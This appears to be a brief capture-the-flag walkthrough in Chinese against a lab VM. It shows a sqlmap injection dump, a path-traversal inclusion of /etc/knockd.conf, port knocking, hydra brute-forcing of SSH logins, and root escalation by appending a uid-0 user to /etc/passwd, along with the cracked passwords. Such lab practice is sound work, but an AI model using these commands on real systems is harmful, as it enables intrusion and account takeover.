python sqlmap.py -u "http://192.168.56.110/results.php" --data="search=1'" -D Staff -T Users --dump
得到密文admin 856f5de590ef37314e7c3bdf6f8a66dck口令是transorbital1
登录后台后发现文件包含漏洞http://192.168.56.110/manage.php?file=../../../../../../../../etc/knockd.conf得到端口敲门序列7469,8475,9842，用nmap依次敲门后可以SSH连接22端口
根据sqlmap的用户名进行hydra爆破，得到许多用户，只有janitor Ilovepeepee存在隐藏文件，是其他用户口令
再次hydra爆破用户名得到fredf口令B4-Tru3-001
sudo -l发现可以用root执行/opt/devstuff/test.py，可以向/etc/passwd追加用户，完成提权
openssl passwd -1 -salt admin 111111
echo "admin:$1$admin$2WRLhTGcIMgZ7OhwCpREK1:0:0::/root:/bin/bash" >> /tmp/tc
sudo /opt/devstuff/dist/test/test /tmp/tc /etc/passwd
su admin
